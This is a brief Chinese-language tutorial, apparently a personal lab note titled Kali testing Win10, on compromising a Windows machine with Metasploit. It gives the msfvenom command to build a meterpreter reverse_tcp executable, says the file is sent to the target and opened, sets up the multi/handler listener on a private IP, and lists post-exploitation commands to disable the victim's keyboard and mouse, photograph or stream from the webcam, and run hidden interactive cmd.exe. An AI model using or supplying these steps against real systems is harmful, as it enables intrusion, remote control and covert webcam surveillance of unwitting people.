kali***测试win10
通过msfvenom生成***
msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe
把***传过去,点开就会往自己开放的ip和端口发送一个tcp链接

在kali中

msfconsole

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 172.16.4.3 #设置本地ip

lhost => 172.16.4.3

msf exploit(multi/handler) > set lport 44444 #设置本地端口

lport => 44444

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.16.4.3:44444
tcp链接以后可以使用以下功能

uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘

webcam摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频

execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互